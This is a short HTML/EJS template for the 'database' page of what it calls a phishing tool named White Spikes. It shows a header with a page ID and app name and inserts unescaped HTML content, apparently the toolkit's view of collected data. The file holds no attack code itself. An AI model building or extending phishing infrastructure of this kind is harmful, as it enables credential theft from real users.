<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>White Spikes DATABASE | Pishing Tool</title>
    <link rel="stylesheet" href="./assets/css/main.css">
    <link rel="stylesheet" href="./assets/css/database.css">
    <script src="./assets/js/database-b.js" defer></script>
</head>

<body>
    <header class="header">
        <div class="left">
            <h2><b>@</b>White<span>Spikes</span></h2>
            <h6>- Created by Madhan</h6>
        </div>

        <div>
            <pre>ID      : <%- page.id %></pre>
            <pre>APPNAME : <%- page.appName %></pre>
        </div>
    </header>

    <section>
        <%- html %>
    </section>
</body>

</html>